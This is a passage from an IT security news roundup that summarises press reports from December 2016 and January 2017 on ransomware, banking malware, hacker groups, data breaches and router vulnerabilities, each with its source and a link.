The cyberattack hit 700 computers at all of the city's 16 library branches, according to spokeswoman Jen Hatton.

The entire checkout system is on hold. No one can walk out with any of the library's 4 million books, magazines and videos. And all computers are frozen, she said.

-----------------------
SPANISH POLICE NAB SUSPECT BEHIND NEVERQUEST BANKING MALWARE
(Computer World, dated 20th January 2017 author Michael Kan)

Full article [Option 1]:

www.computerworld.com/article/3160025/security/spanish-police-nab-suspect-behind-neverquest-banking-malware.html

Spanish police have arrested a Russian programmer suspected of developing the Neverquest banking Trojan, a malware targeting financial institutions across the world.

The 32-year-old Russian citizen known as Lisov SV was arrested at the Barcelona airport, Spain's law enforcement agency Guardia Civil said on Friday.

The FBI had been working with Spanish authorities to track down the suspect through an international arrest warrant, according to a statement from the agency. The FBI, however, declined to comment on the man's arrest.

Neverquest is designed to steal username and password information from banking customers. Once it infects a PC, the malware can do this by injecting fake online forms into legitimate banking websites to log any information typed in. It can also take screenshots and video from the PC's desktop and steal any passwords stored locally.

-----------------------
CHINESE INVESTORS GOBBLE UP OWNER OF COMPUTER WORLD, PCWORLD, MACWORLD ETC
(The Register, dated 20th January 2017 author Chris Mellor)

Full article [Option 1]:

www.theregister.co.uk/2017/01/20/idgs_chinese_child_partnering_to_buy_parent/

Two Chinese investors are buying the owner of PCWorld magazine and the IDC market research outfit - International Data Group (IDG) - but IDC's high-performance computing research businesses are not included in the sale.

The two Chinese investors are China Oceanwide Holdings Group Co, Ltd and the confusingly named IDG Capital. They were apparently bidding separately several months ago, but joined forces under the encouragement of Goldman Sachs, IDG's banker.

They are paying a sum estimated between $500m and $1bn. The American Committee on Foreign Investment in the United States (CFIUS) has cleared the sale, which should complete by April.

IDG claims it is the number one tech media group in the world, with operations in 97 countries. Its media brands include CIO, Computerworld, PCWorld, Macworld and more, with a zillion associated events, such as CIO round tables and perspectives. It is headquartered in Boston and was founded by Pat McGovern in 1964; McGovern died in 2014. He made 130 trips to China during his career.

----------------------

RANSOMWARE SCUM INFECT CANCER NON-PROFIT ORGANISATION
(The Register, dated 18th January 2017 author Team Register)

Full article [Option 1]:

www.theregister.co.uk/2017/01/18/ransomware_scum_infect_cancer_nonprofit/

Ransomware scum have hit a new low by infecting a not-for-profit cancer support organization in Muncie, Indianapolis, US.

Little Red Door provides diagnostics, treatment, and supplies to under-served patients, among other services. It told the Associated Press this week that miscreants infected its central server, stripped and encrypted data, and demanded a steep 50 Bitcoin (US$44,000) payment.

Executive director Aimee Fant says the lion's share of the agency's data was located in unspecified cloud storage. She says the agency will be forced to take the hit and not pay the ransom since its funds are supposed to help cancer patients and their families.

The agency plans to replace the affected server with a "secure cloud-based" system and hopes to be back up and running by the week's end. It did not ask for volunteer assistance.

----------------------
MAC MALWARE USES "TRULY ANTIQUE" METHODS TO CONDUCT ESPIONAGE ON SCIENTIFIC FACILITIES
(International Business Times, dated 19th January 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/mac-malware-uses-truly-antique-methods-conduct-espionage-scientific-facilities-1602035

A strain of malware targeting Apple Mac computers, the first of its kind found in 2017, has been found to use "ancient" code to spy on biomedical research facilities. Known as Quimitchin, evidence suggests it has existed undetected for a number of years.

On the surface the malware seems simplistic, but researcher Thomas Reed said it is only likely to have stayed under the radar for so long because it was being used in what he called "very tightly targeted attacks". In a blog post, he said that it was unlike anything he had seen before.

Quimitchin is designed to take screenshots of an infected computer system and gain access to the webcam functionality. It can also be used by an attacker to simulate mouse clicks and key presses, and to change the position of a computer cursor.

However, what makes this Mac malware stand out is that it uses some "truly antique" methods to carry out these commands, with some functions dating back to "pre-OSX" days and one component relying on open-source code last updated in 1998.

-----------------------
HACKER GROUP THAT PULLED OFF BILLION DOLLAR BANK JOB NOW USING GOOGLE SERVICES FOR MALWARE MONITORING
(International Business Times, dated 19th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hacker-group-that-pulled-off-billion-dollar-bank-job-using-google-services-malware-monitoring-1601879

An organised cybercrime syndicate, which was believed to be responsible for pulling off one of the biggest cyberheists in 2015, is now reportedly using Google services for its malware monitoring purposes. Security researchers believe that the Carbanak gang, named after their customised malware, has taken to using Google services to issue its command and control (C&C) communication, in efforts to better track and control its current and potential victims.

The Carbanak hacker group, also known as Anunak, is believed to have been operational since 2013. However, it was only in 2015 that the group's activities came to light, after the cybercriminals used their Trojan malware to launch targeted attacks against global banks, making off with an estimated $1bn.

---------------------
CYBER FRAUDSTERS USE SOCIAL MEDIA TO TRICK UK COMPANIES INTO DONATING TO SHAM SYRIA MIGRANT APPEAL
(International Business Times, dated 17th January 2017 author William Watkinson)

Full article [Option 1]:

www.ibtimes.co.uk/cyber-fraudsters-use-social-media-trick-uk-companies-into-donating-sham-syrian-migrant-appeal-1601605

Cyber fraudsters have been using social media and emails to trick British companies and members of the public into donating to a sham charity appeal that claimed to help Syrian migrants. On Tuesday (17 January) the UK's charity regulator, the Charity Commission, issued an alert to the public and businesses to raise awareness of phishing emails containing bogus charity appeals.

The commission said that fraudsters sent emails purporting to be from a genuine charity named as the Migrant Helpline. Although the charity is in no way linked to the fraud, the emails purportedly from them carried a link containing malware to steal banking details, the Charity Commission said.

-----------------------
RANSOMWARE BRUTES ATTACKED 1 IN 3 NHS TRUSTS LAST YEAR
(The Register, dated 17th January 2017 author John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/01/17/nhs_ransomware/

A third (30 per cent) of NHS trusts have been infected by ransomware, with one - the Imperial College Healthcare in London - suffering 19 attacks in just 12 months.

According to results of a Freedom of Information-based study, none of the trusts reported paying a ransom or informed law enforcement. All preferred to deal with the attacks internally.

Additionally, of the 15 trusts who were able to provide further information about the origin of the attacks, 87 per cent reported that the attacker gained access through a networked NHS device, with 80 per cent targeted by a phishing scheme.

The figures are based on a Freedom of Information request from cyber security firm SentinelOne, which received responses from 94 of the 129 trusts quizzed.

Ransomware, which encrypts data on compromised devices before demanding a ransom to regain access, has affected a number of hospitals worldwide over recent months. For example, the Hollywood Presbyterian Medical Center in Los Angeles paid cybercriminals £12,000 last February after being infected by Locky, one of the most prolific ransomware variants.

-----------------------
LOCKY MALWARE ATTACKS TO RETURN WITH A VENGEANCE
(International Business Times, dated 17th January 2017)

Full article [Option 1]:

www.ibtimes.co.uk/locky-malware-attacks-return-vengeance-experts-warn-1601551

Everyone likes a break over Christmas and the New Year - even malware developers firmly committed to a life of cybercrime. That's according to multiple cybersecurity firms, each warning that a recent lull in global malware circulation is unlikely to last for much longer.

One strain of ransomware called Locky - which infects victims via malicious spam links and can hold entire computer networks to ransom - all but disappeared over the Christmas period, with an 81% decrease in overall activity in the space of a week, experts have revealed.

US-based cybersecurity firm Checkpoint said global malware attacks fell by 8% in December compared with stats from the month previous. Meanwhile, Cisco's Talos expert Jaeson Schultz revealed how use of the 'Necurs' botnet also significantly decreased.

In any case, the researchers are now telling the public not to expect the relative calm to continue. "We expect attack volumes to bounce back in January," Checkpoint has warned in a new blog post.

-----------------------
FRANCE GEARS UP FOR 2017 ELECTIONS BY SETTING UP DEFENCES AGAINST CYBERATTACKS
(International Business Times, dated 17th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/france-gears-2017-elections-by-setting-defences-against-cyberattacks-1601403

France is just months away from its presidential elections and concerns over election hacking appear to be increasingly at the forefront. Following recent allegations of Russia interfering in the 2016 US presidential election, European countries have ramped up cyber defences. France too is setting up measures to deter and counter potential cyberattacks targeting its election in May, according to reports.

France's National Agency for the Security of Information Systems (L'Agence nationale de la sécurité des systèmes d'information, or ANSSI) has been tasked with providing support and advice to French political parties.

------------------------
OUTAGE-HIT LLOYDS BANK IN TALKS TO OUTSOURCE DATA CENTRES TO IBM
(The Register, dated 13th January 2017 author Paul Kunert)

Full article [Option 1]: www.theregister.co.uk/2017/01/13/lloyds_bank_in_talks_to_outsource_bit_barns_to_ibm/

In the week that Lloyds Banking Group suffered multiple outages, it has emerged the UK financial giant is negotiating to outsource management of its bit barns (data centres) to IBM Global Business Services.

Online services were interrupted on Wednesday and Thursday by unspecified technical glitches that prevented people from logging into their accounts, a problem that again flared up over lunchtime today.

Multiple sources told us about the talks with Big Blue - which started some months ago - though there is no certainty an agreement will be reached.

"IBM is having conversations with Lloyds about a massive buyback of their estate," said a person familiar with the matter, adding: "Lloyds will reverse management and the estate and maybe get some cash in the process."

Under the deal, IBM would pay for the data centre assets, transfer them to its balance sheet, and then charge Lloyds for the ongoing management.

-----------------------
HOW RUSSIA HACKS : FIREEYE ANALYSIS EXPOSES MAIN TACTICS USED BY "FANCY BEAR"
(International Business Times, dated 12th January 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/how-russia-hacks-fireeye-analysis-exposes-main-tactics-used-by-fancy-bear-1600768

Last December the US Intelligence Community (IC) released a report naming APT28, a suspected Russian hacking group, as being linked to numerous cyberattacks designed to influence the outcome of the 2016 presidential election with a mixture of leaks and misinformation.

Highlighting Russian "malicious cyber activity", the IC's analysis reported on this "advanced persistent threat" by confirming it was likely linked to the country's military or intelligence services. The hackers go by many names: Fancy Bear, Pawn Storm, Sofacy, Sednit, Tsar Team and more.

The group - after targeting the Democratic National Committee (DNC), the World Anti-Doping Agency (Wada) and the German government - is the focus of a new report from US-based cybersecurity firm FireEye, discussing the key hacking techniques it uses.

----------------------
MALWARE DUBBED NUKE PUT UP FOR SALE ON DARK WEB BY ALLEGED RUSSIAN HACKER
(International Business Times, dated 11th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/malware-dubbed-nuke-put-sale-dark-web-by-alleged-russian-hacker-1600438

Security researchers have uncovered a new malware strain, dubbed Nuke, put up for sale on the dark web by an alleged Russian cybercriminal going by the pseudonym Gosya. Researchers noted that the malware comes with several features, including "bot killer" abilities, which allows it to remove all competing malware from an infected machine.

According to researchers at cybersecurity firm Sixgill, which specialises in detecting and defusing cyberattacks and data leaks originating from the dark web, the Nuke malware comes with Chrome and Firefox code-injecting abilities. It fully supports 32-bit and 64-bit systems alike and is also capable of bypassing UAC and the Windows Firewall.

-----------------------
BROTHER - SISTER DUO ACCUSED OF HACKING ITALY'S ELITE, INCLUDING FORMER PMs, A VATICAN CARDINAL AND BANKERS
(International Business Times, dated 11th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/brother-sister-duo-accused-hacking-italys-elite-including-former-pms-vatican-cardinal-bankers-1600401

A brother-sister hacker duo has been arrested by Italian police for developing a customised malware and hacking into email accounts of Italy's elite. Giulio Occhionero, 45, a nuclear engineer, and his sister Francesca Maria Occhionero, 48, both of whom reside in Rome, have been charged with launching a massive cyberespionage campaign that targeted two former Italian prime ministers, a Vatican cardinal, the president of the European Central Bank and thousands of others, according to reports.

The hackers, who also have residency in the UK, but were believed to have been residing in Rome in the recent past, were charged with hacking and stealing state secrets. The siblings have been accused of hacking at least 18,000 email accounts, which belonged to Italian businessmen, bankers, and politicians, including former prime ministers Matteo Renzi and Mario Monti.

-----------------------
GERMAN SPY CHIEF WANTS TO HIT BACK AT HACKERS AMID INCREASING CYBERTHREATS
(International Business Times, dated 11th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/german-spy-chief-wants-hit-back-hackers-amid-increasing-cyberthreats-1600371

Hans-Georg Maassen, Germany's domestic intelligence agency chief, reportedly said that German intelligence agencies need to do more than just protect and defend the country's digital infrastructure. He called for intelligence agencies to counter cyberattacks launched by hackers and cyber-enemies, according to a report.

"We think it's essential that we don't just act defensively, but that we are also able to attack the enemy so that he stops continuing to attack us in the future," Maassen, president of the Federal Office for the Protection of the Constitution (BfV), told the German news agency dpa, the Guardian reported.

According to reports, recent attacks, both in cyberspace and in the real world, have triggered concerns about the competence of German intelligence agencies and police forces, and their ability to respond to and mitigate attacks.

Maassen lamented that his agency was not authorised to delete files that had been accessed or stolen by hackers and stored on external servers. "Thus we have a high risk that the damage will increase, because third parties as well as the culprit can access the data," he said.

----------------------
DATABASE RANSOM ATTACKS SOAR, BODY COUNT HITS 27,000 IN HOURS
(The Register, dated 9th January 2017 author Darren Pauli)

Full article [Option 1]: www.theregister.co.uk/2017/01/09/mongodb/

MongoDB databases are being decimated in soaring ransomware attacks that have seen the number of compromised systems more than double to 27,000 in a day.

Criminals are accessing, copying and deleting data from unpatched or badly-configured databases.

Administrators are being charged ransoms to have data returned. Initial attacks saw ransoms of 0.2 bitcoins (US$184) to attacker harak1r1, of which 22 victims appeared to have paid, up from 16 on Wednesday when the attacks were first reported.

----------------------
RANSOMWARE SLEAZEBALLS TARGET UK SCHOOLS
(The Register, dated 6th January 2017 author John Leyden)

Full article [Option 1]: www.theregister.co.uk/2017/01/06/ransomware_crooks_target_schools/

Cybercrooks are targeting UK schools, demanding payments of up to £8,000 to unlock data they have encrypted with malware.

Action Fraud warns that fraudsters are cold-calling schools claiming to be from the Department of Education and asking for the head teachers' email addresses. Crooks then send booby-trapped emails with infectious zip attachments supposedly containing sensitive information.

In reality, these files carry file-encrypting ransomware. Action Fraud is urging educational establishments to be vigilant.

Andrew Stuart, managing director of backup and disaster recovery vendor Datto, commented: "Unscrupulous hackers see ransomware as a business, and have already been known to exploit hospitals and even charities, so schools were always possible targets.

"It is vital that schools review their data backup procedures to ensure that they not only have copies of all critical data, but can restore their data smoothly in the event of a ransomware incident."

----------------------
D-LINK ROUTERS AND IoT CAMERAS COULD GIVE HACKERS EASY ACCESS TO LIVE VIDEO AND AUDIO
(International Business Times, dated 6th January 2017 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/d-link-routers-iot-cameras-could-give-hackers-easy-access-live-video-audio-1599712

The US Federal Trade Commission (FTC) has filed a legal complaint against Taiwan-based networking firm D-Link and its US subsidiary, claiming that "inadequate" cybersecurity measures leave users of its wireless routers and web-connected cameras at risk of hacking.

The complaint, filed in a Californian District court, details how the FTC believes D-Link has neglected the security of its internet-of-things (IoT) product range, a move it alleged could leave both consumer privacy - and personal information - wide open to compromise.

The firm's routers and Internet Protocol (IP) cameras could potentially leak sensitive consumer data, including live video and audio feeds from D-Link IP cameras, the US watchdog said.

----------------------
PETYA RANSOMWARE VARIANT GOLDENEYE TARGETS HR DEPARTMENTS BY SENDING FAKE JOB APPLICATIONS
(International Business Times, dated 6th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/petya-ransomware-variant-goldeneye-targets-hr-departments-by-sending-fake-job-applications-1599659

Cybercriminals have become increasingly skilled at modifying and customising malware in efforts to ensure that targeted victims are reeled in successfully by a malicious campaign. Ransomware authors in particular are now increasingly developing ransomware strains designed to target a specific victim pool. A new variant of the prolific Petya ransomware has been spotted, specifically targeting HR departments, by sending in fake job applications.

The applications are designed to look legitimate and come with a malware-laced attachment, which when opened, infects the victim's system and encrypts all data. The applications are sent via email and include two attachments: one which poses as a cover letter and acts as a lure to victims and the other, an Excel file that contains malicious macros.

According to Check Point security researchers, GoldenEye ransomware targets firms' HR "due to the fact they usually cannot avoid opening emails and attachments from strangers, a common malware infection method".

-----------------------
FIRECRYPT RANSOMWARE EMERGES WITH DDoS LAUNCHING CAPABILITIES
(International Business Times, dated 5th January 2017 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/firecrypt-ransomware-emerges-ddos-launching-capabilities-1599460

A new ransomware strain uncovered by security researchers, dubbed FireCrypt, reportedly comes with features which allow the ransomware to launch relatively small-scale DDoS attacks. FireCrypt was found to share several similarities with a previously uncovered ransomware strain called Deadly for a Good Purpose, indicating that the two may be linked, according to a report.

As is usual, once victims' files have been encrypted, the ransomware serves up a ransom note. FireCrypt's authors are currently believed to be demanding $500 (£406) in bitcoins from their victims.

There currently appears to be no known way to recover files encrypted by the FireCrypt ransomware. However, reports speculate that a decrypter may soon be made public.

-----------------------
ANDROID TOPS 2016 VULNERABILITIES LIST
(The Register, dated 3rd January 2017 author Richard Chirgwin)

Full article [Option 1]:

www.theregister.co.uk/2017/01/03/android_tops_2016_vuln_list_with_523_bugs/

Background (uaware): The MITRE Corporation is a not-for-profit US company that operates multiple federally funded research and development centres. Common Vulnerabilities and Exposures (CVE) entries are publicly recorded software flaws, each given an identifier, that typically require a fix or patch to the affected software to remove the security risk.

Of any single product, CVE Details reckons, Android had the most reported vulnerabilities in 2016 - but as a vendor, Adobe still tops the list.

The analysis is limited by the fact that only vulnerabilities passing through Mitre's Common Vulnerabilities and Exposures (CVE) database are counted. That's a statistically worthwhile dataset, however, since 10,098 bugs were assigned numbers during 2016.

Top of the vulnerabilities (Operating Systems / Programs) :

1. Android : 523
2. Debian Linux : 319
3. Ubuntu Linux : 278
4. Adobe Flash : 266

Even so, with 523 vulnerabilities landing a CVE number in 2016, Android carried nearly double the patch-load of Adobe Flash. Many of the CVEs attributed to the Linux distributions will be inherited from third-party packages included in those distributions.

Top of the vulnerabilities (Vendors) :

1. Adobe : 1,383
2. Microsoft : 1,325
3. Google : 695
4. Apple : 611

----------------------

NEW ANDROID-INFECTING MALWARE HIJACKS ROUTERS
(The Register, dated 3rd January 2017 author John Leyden)

Full article [Option 1]:

www.theregister.co.uk/2017/01/03/android_trojan_targets_routers/

Hackers have brewed up a strain of Android malware that uses compromised smartphones as conduits to attack routers.

The Switcher trojan does not attack Android device users directly. Instead, the malware uses compromised smartphones and tablets as tools to attack any wireless networks they connect to.

Switcher brute-forces access to the network's router and then changes its DNS settings to redirect traffic from devices connected to the network to a rogue DNS server, security researchers at Kaspersky Lab report.

This server fools the devices into communicating with websites controlled by the attackers, leaving users wide open to either phishing or further malware-based attacks.

----------------------
RANSOMWARE ARRIVES ON SMART TVs
(Computer World, dated 3rd January 2017 author Lucian Constantin)

Full article [Option 1]:

www.computerworld.com/article/3153953/security/ransomware-arrives-on-smart-tvs.html

It took a year from proof of concept to in-the-wild attack, but ransomware for Android-based smart TVs is now here. As one victim discovered this Christmas, figuring out how to clean such an infection can be quite difficult.

Ransomware for Android phones has already been around for several years and security experts have warned in the past that it's only a matter of time until such malicious programs start affecting smart TVs, especially since some of them also run Android.

In November 2015, a Symantec researcher named Candid Wueest even went as far as to infect his own TV with an Android ransomware application to highlight the threat. While that infection was just a demonstration, this Christmas, the owner of an LG Electronics TV experienced the real deal.
----------------------

(4th February 2017)



IT SECURITY REVIEW - DECEMBER 2016

----------------------
TOP 5 HACKER GROUPS THAT MADE THE INTERNET A BATTLEGROUND IN 2016
(International Business Times, dated 31st December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/top-5-hacker-groups-that-wreaked-havoc-2016-1598789

Cyberspace surfaced as the new and limitless battleground in 2016. The past year has seen one of the most devastating cyberattacks that affected a wide variety of global sectors, including financial, geo-political and technology areas.

The past year saw the emergence of several previously unknown, elite hacker groups, whose campaigns have wreaked havoc globally and caused wide-scale panic among the tech community.

While some groups launched targeted DDoS attacks, focusing on harvesting data from tech giants, others operated long-term espionage campaigns that attempted to topple political and national infrastructures.

IBTimes UK looks back at the top 5 elite hacker groups that are believed to be responsible for conducting some of the most prominent cyberattacks of the year:

- The Kremlin hackers - Fancy Bear and Cozy Bear
- Shadow Brokers
- Cyber thieves hacking banks
- Islamic State hackers
----------------------
HACKERS HIT STAR WARS COLLECTABLE TRADING CARD FIRM TOPPS
(International Business Times, dated 31st December 2016 author India Ashok)

Full article [Option 1]:

Hackers have reportedly hit iconic collectable trading cards manufacturing firm Topps. The company's popular products include Star Wars, Disney's Frozen, Top Gear and the UEFA Champions League. The firm reportedly believes that hackers may have gained access to users' sensitive personal and financial information.

The data breach occurred earlier in the year and likely saw hackers making away with user information, including debit and credit card data. Topps told the BBC that the security vulnerability has been fixed. The firm is also offering customers one year's worth of free identity theft protection.

----------------------

ENIGMA TECHNOLOGY TO MAKE NEW ULTRA-SECURE BANK CARD
(The Telegraph via MSN, dated 24th December 2016 author Henry Bodkin)

Full article [Option 1]:

www.msn.com/en-us/news/technology/enigma-technology-to-make-new-ultra-secure-bank-card/ar-BBxvKGD?li=BBnbklF&ocid=spartandhp

Second World War cipher technology is being built into tiny processors to develop the next generation of ultra-secure bank cards.

The concept behind the design of Nazi military coding machines such as Enigma will be used to replace the existing three-digit CVV security number, which is currently found on the back of credit and debit cards.

Instead, cards will include a device that generates a frequently changing number to wrong-foot fraudsters.

The innovation is being hailed as the biggest shake-up in the field since the introduction of chip and PIN in 2004.

Inventors David Taylor and George French have secured a patent for the technology, which Barclays plans to adopt.

-----------------------
MASSIVE AD FRAUD CAMPAIGN "METHBOT" PROFITS EXCEED $3 MILLION PER DAY
(TechTarget, dated 23rd December 2016 author Madelyn Bacon)

Full article [Option 1]:

http://searchsecurity.techtarget.com/news/450410008/Massive-ad-fraud-campaign-Methbot-profits-exceed-3-million-per-day

A massive cybercrime operation has been making millions of dollars a day by generating huge numbers of phony video ad impressions, according to a new report.

Researchers at cybersecurity vendor White Ops Inc. uncovered a bot farm, dubbed Methbot, that makes between $3 million and $5 million per day by conducting ad fraud by impersonating legitimate websites, running on custom browsers, and faking click rates and social media logins. Methbot -- so called because of the reference to "meth" in its code -- primarily focuses on video ads that are worth three cents per view, and "watches" about 300 million of them per day, targeting and spoofing more than 6,000 domains.

"Because White Ops is only able to analyze data directly observed by White Ops, the total ongoing monetary losses within the greater advertising ecosystem may be larger," the report states. This makes Methbot significantly larger and more profitable than other ad fraud campaigns, such as ZeroAccess, which makes approximately $900,000 per day, and Chameleon, which makes approximately $200,000 per day.

Methbot runs out of around 1,000 dedicated servers that operate from data centers in the U.S. and the Netherlands.

-----------------------
LINKEDIN SKILL-LEARNING UNIT LYNDA.COM HIT BY DATABASE BREACH
(Computer World, dated 19th December 2016 author John Ribeiro)

Full article [Option 1]:

www.computerworld.com/article/3151784/security/linkedin-skill-learning-unit-lyndacom-hit-by-database-breach.html

Lynda.com, the online learning unit of LinkedIn, has reset passwords for some of its users after it discovered recently that an unauthorized external party had accessed a database containing user data.

The passwords of close to 55,000 affected users were reset as a precautionary measure and they have been notified of the issue, LinkedIn said in a statement over the weekend.

The professional network is also notifying about 9.5 million Lynda.com users who "had learner data, but no protected password information," in the breached database. "We have no evidence that any of this data has been made publicly available and we have taken additional steps to secure Lynda.com accounts," according to the statement.

-----------------------

GCHQ URGED TO RAMP UP SECURITY TO PROTECT BRITAIN'S FINANCIAL INDUSTRY FROM ESCALATING CYBERCRIME
(International Business Times, dated 19th December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/gchq-urged-ramp-security-protect-britains-financial-industry-escalating-cybercrime-1597122

British intelligence agencies have been urged to ramp up cybersecurity to help protect the financial sector from escalating cybercrime. The parliament's Treasury Committee has expressed concerns over GCHQ's focus on terrorism-related and state-sponsored cyberattacks.

Conservative Party lawmaker Andrew Tyrie said that the committee was concerned about the "opaque lines of accountability", especially between intelligence agencies and regulators.

The call for greater cybersecurity protection for Britain's financial sector closely follows the cyberattack on Tesco Bank in November. The hack saw cybercriminals steal £2.5m ($3.1m) from over 9,000 customer accounts.


----------------------
GERMAN INFORMATION SECURITY AGENCY URGES SECURITY REVIEW
(The Register, dated 16th December 2016 author Darren Pauli)

Full article [Option 1]:

www.theregister.co.uk/2016/12/16/germanii_infosecii_bossii_urgesii_securityii_reviewii_afterii_yahooii_flensingii/

Germany's Bundesamt für Sicherheit in der Informationstechnik (Federal Office for Information Security or BSI) has warned users to reconsider the security chops of their email providers and plugged local services in response to news a billion credentials were stolen from Yahoo!

The oft-raided web concern revealed yesterday that hackers of unknown identity raided its servers and made off with a mind-bogglingly large hoard of phone numbers, addresses, weak MD5-hashed passwords, and security questions and answers.

President of BSI Arne Schönbohm issued a statement slapping email providers, though not naming Yahoo!, for poor security form, and advised Germans to consider local providers with strong infosec credentials.

"There are a number of providers in Germany who take security seriously," Schönbohm says in the statement (in German, shoved through an online translator).

-----------------------
PENTAGON HIT BY RUSSIAN HACKERS IN CRIPPLING ATTACK THAT FORCED FULL SYSTEM OVERHAUL
(International Business Times, dated 16th December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/pentagon-hit-by-russian-hackers-crippling-attack-that-forced-full-systems-overhaul-report-1596798

Russian hackers reportedly launched a targeted cyberattack on the Pentagon in August 2015, which saw the unclassified email system used by the Joint Chiefs of Staff hijacked, leaving data of nearly 3,500 military personnel and civilians vulnerable to exposure. The attack's aim is believed to have been to cripple the Pentagon's systems, rather than a cyberespionage campaign, according to a report.

The then-chairman of the Joint Chiefs Martin Dempsey told CBS News that the NSA director Admiral Mike Rogers alerted him about the attack in an early morning phone call. The attack saw passwords and electronic signatures of Dempsey and hundreds of other senior Army officials obtained by the hackers.

-----------------------

HOW TO CHECK IF YOUR YAHOO ACCOUNT WAS HACKED
(Express, dated 15th December 2016 author Aaron Brown)

Full article [Option 1]:

www.express.co.uk/life-style/science-technology/743756/How-To-Check-Yahoo-Account-Hack-Change-Password

Yahoo today admitted that another devastating security breach has resulted in the theft of personal information from at least one billion Yahoo accounts.

An investigation is still ongoing into the breach, which Yahoo said occurred back in 2013.

"Yahoo has identified data security issues concerning certain Yahoo user accounts," the firm confirmed in a statement. "Yahoo has taken steps to secure user accounts and is working closely with law enforcement. As Yahoo previously disclosed in November, law enforcement provided the company with data files that a third party claimed was Yahoo user data.

"The company analysed this data with the assistance of outside forensic experts and found that it appears to be Yahoo user data.

"Based on further analysis of this data by the forensic experts, Yahoo believes an unauthorised third party, in August 2013, stole data associated with more than one billion user accounts."

Yahoo said the stolen information includes names, email addresses, telephone numbers, dates of birth, and hashed passwords.

Payment card data and bank account information was not compromised, Yahoo added.

----------------------
MALVERTISING CAMPAIGN TARGETS ROUTERS AND EVERY DEVICE CONNECTED TO ROUTER
(Computerworld, dated 14th December 2016 author Darlene Storm)

Full article [Option 1]:

http://www.computerworld.com/article/3150101/security/malvertising-campaign-targets-routers-and-every-device-connected-to-router.html

Well this is just peachy - cybercriminals are actively using a malvertising campaign that infects routers and even Android devices. If the router is pwned, then every device connected to that router is pwned.

Proofpoint researchers warned that cyber thugs are using a new and improved version of the DNSChanger exploit kit (EK) for this malvertising campaign.

Generally, malvertising involves an attacker injecting malware into ads which can infect via browsers and attack a victim's computer after simply visiting an affected page. Earlier this year, people were hit with malvertising just by visiting popular high-profile sites such as The New York Times, The Hill, MSN, BBC, NFL, AOL, Newsweek and my.xfinity.com. But this time, the malvertising exploit kit is aimed at routers.

----------------------
GLOBAL POLICE CRACKDOWN ON DDoS SERVICES NETS SUSPECTED TEENAGE CYBERCRIMINALS
(International Business Times, dated 13th December 2016 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/global-police-crackdown-ddos-services-nets-suspected-teenage-cybercriminals-1596273

An international law enforcement crackdown on users of cheap, widely-accessible cybercrime tools that can knock websites offline with ease has resulted in 34 arrests and 101 cautions around the world, with many of the suspects "young adults under the age of 20."

The operation, which had different titles in various jurisdictions, ran from 5-9 December and targeted individuals suspected of paying for distributed-denial-of-service (DDoS) services which can be purchased for as little as £4 on the Dark Web.

Europol, the police force of the European Union (EU), which co-ordinated the joint operation with agents from the FBI and the UK's National Crime Agency (NCA), said police aimed to deter young people from wading into the world of cybercrime by using arrests, warnings and fines.

-----------------------
NETGEAR ROUTER USERS WARNED
(International Business Times, dated 13th December 2016 author Jason Murdock)

Full article [Option 1]:

www.ibtimes.co.uk/netgear-users-warned-switch-off-your-home-internet-router-risk-being-hacked-1596334

If you own a router made by Netgear, a US government-backed security group is warning it may be vulnerable to hackers. The firm, which has confirmed the problems exist, is now working to rush out urgent fixes after the critical flaws were discovered to impact a slew of its products.

The US Computer Emergency Readiness Team (US-CERT) at Carnegie Mellon University says users should consider disabling their routers completely until a proper fix is rolled out. In an advisory, it explained how the easily-exploitable flaw could be used to allow complete control over the router.

After conducting tests on its product range, Netgear said the vulnerability impacts the following routers: R6250, R6400, R6700, R7000, R7100LG, R7300, R7900, and R8000. According to security blog CSO, there are nearly 10,000 devices at immediate risk.

------------------------
HACKERS HIT THYSSENKRUPP STEALING TRADE SECRETS
(International Business Times, dated 9th December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hackers-hit-thyssenkrupp-stealing-trade-secrets-massive-cyberattack-1595677

ThyssenKrupp, one of the largest global steel manufacturers, has confirmed that it was hit by hackers and that sensitive trade secrets have been stolen as part of a "massive" cyberattack. The data breach, which was uncovered by the firm's internal security department in April, involved hackers making away with project data from ThyssenKrupp's plant engineering division and possibly other areas, according to reports.

"ThyssenKrupp has become the target of a massive cyber attack," the industrial conglomerate said in a statement, Reuters reported. The firm is yet to divulge information on how many of its departments were compromised, adding that it currently cannot estimate the scope of intellectual property losses.

-----------------------

HACKERS LAUNCH STEALTH MALVERTISING CAMPAIGN EXPOSING MILLIONS ONLINE TO SPYWARE AND MORE
(International Business Times, dated 7th December 2016 author India Ashok)

Full article [Option 1]:

www.ibtimes.co.uk/hackers-launch-stealth-malvertising-campaign-exposing-millions-online-spyware-more-1595238

Millions of internet users visiting popular news sites over the past few months may have been exposed to a malicious malvertising campaign. The cybercriminals behind the campaign are distributing malicious ads, which redirect users to the Stegano exploit kit.

Security researchers found that the Stegano malvertising campaign exploited several Flash vulnerabilities. The malicious ads came with attack code embedded within individual image pixels. Stegano has been active since 2014; however, researchers noted a fresh campaign launched in October, which operates in an exceedingly stealthy manner to infect victims.

See also :

www.computerworld.com/article/3147908/security/malicious-online-ads-expose-millions-to-possible-hack.html

-----------------------
TALKTALK WIFI ROUTER PASSWORDS STOLEN
(BBC News, dated 5th June 2016 author Leo Kelion)

Full article : www.bbc.co.uk/news/technology-38208958

TalkTalk customers' wi-fi passwords have been stolen following a malware attack that blocked their internet access last week, an expert has warned.

The researcher said other details had also been taken that would let attackers pinpoint where the equipment was being used, making more targeted hacks possible.

-----------------------
NEW BOTNET LAUNCHING DAILY MASSIVE DDoS ATTACKS
